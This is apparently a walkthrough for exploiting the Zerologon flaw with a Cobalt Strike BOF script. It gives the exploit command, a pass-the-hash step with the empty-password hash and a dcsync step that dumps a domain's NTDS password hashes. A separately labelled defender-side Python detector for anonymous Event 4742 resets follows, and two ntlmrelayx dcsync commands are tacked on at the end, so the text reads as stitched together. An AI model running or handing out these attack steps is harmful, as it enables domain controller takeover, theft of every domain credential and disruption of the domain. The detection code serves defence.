Download the script here: https://github.com/rsmudge/ZeroLogon-BOF

Load ZeroLogon-BOF/dist/zerologon.cna. A new command should appear in the console: zerologon

Usage:

net domain - get the domain name (for example domain.local)

Launch the exploit:

zerologon iunderstand domain.local

iunderstand is a mandatory confirmation keyword. Exploiting this vulnerability resets the domain controller's machine account password. This exploit can cause the domain controller to malfunction: after the reset, the password stored in AD no longer matches the one the DC holds locally, so replication and other DC services can break until the original password is restored.

If successful, we get:

Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcsync

We do exactly as written. First pth (31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, which is what the reset leaves on the account):

pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0

Then dcsync:

dcsync domain.local

If everything worked, we get the NTDS contents (the domain's password hashes).
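Added defender-side example, not part of this page or of the ZeroLogon-BOF project: the reset described above appears in the DC's Security log as Event ID 4742 ("A computer account was changed") with ANONYMOUS LOGON (SID S-1-5-7) as the subject and "Password Last Set" updated. The script flags such records in constructed sample events (the dictionary field names are assumptions for the example, not a parser for real EVTX files) and also recognises the empty-password NT hash that the pth step above uses.

```python
# Detector for the Zerologon symptom: a DC machine account password reset by an
# anonymous Netlogon caller. Sample events below are constructed, not real logs.
from typing import Iterable, List

ANONYMOUS_SID = "S-1-5-7"  # well-known SID for ANONYMOUS LOGON
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password


def is_suspicious_account_change(event: dict, dc_accounts: set) -> bool:
    """True for a 4742 where an anonymous subject changed a DC account's password."""
    if event.get("EventID") != 4742:
        return False
    if event.get("SubjectUserSid") != ANONYMOUS_SID:
        return False
    target = event.get("TargetUserName", "")
    # machine accounts end with '$'; only domain controllers matter for Zerologon
    if not target.endswith("$") or target.upper() not in dc_accounts:
        return False
    # 4742 lists "Password Last Set" among changed attributes; '-' means unchanged
    return event.get("PasswordLastSet", "-") != "-"


def find_zerologon_resets(events: Iterable[dict], dc_accounts: Iterable[str]) -> List[dict]:
    """Return the events that look like a Zerologon-style machine account reset."""
    dcs = {name.upper() for name in dc_accounts}
    return [e for e in events if is_suspicious_account_change(e, dcs)]


def dumped_hash_is_empty_password(nt_hash: str) -> bool:
    """A DC account whose dumped NT hash equals the empty-password hash has been reset."""
    return nt_hash.strip().lower() == EMPTY_NT_HASH


# Constructed sample Security events (assumed field names, not real log data)
SAMPLE_EVENTS = [
    {"EventID": 4742, "SubjectUserSid": "S-1-5-7", "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "DC01$", "PasswordLastSet": "9/15/2020 10:02:11 AM"},  # suspicious
    {"EventID": 4742, "SubjectUserSid": "S-1-5-21-1-2-3-1001", "SubjectUserName": "svc_admin",
     "TargetUserName": "DC01$", "PasswordLastSet": "9/15/2020 10:05:00 AM"},  # authenticated
    {"EventID": 4742, "SubjectUserSid": "S-1-5-7", "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "WS42$", "PasswordLastSet": "9/15/2020 10:06:00 AM"},  # not a DC
    {"EventID": 4624, "SubjectUserSid": "S-1-5-7", "TargetUserName": "DC01$"},  # wrong event
]

if __name__ == "__main__":
    for hit in find_zerologon_resets(SAMPLE_EVENTS, ["DC01$"]):
        print("possible Zerologon reset of", hit["TargetUserName"], "at", hit["PasswordLastSet"])
```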
# target vulnerable to Zerologon, dump DC's secrets only
ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER'
# target vulnerable to Zerologon, dump Domain's secrets
ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER' -auth-smb 'DOMAIN'/'LOW_PRIV_USER':'PASSWORD'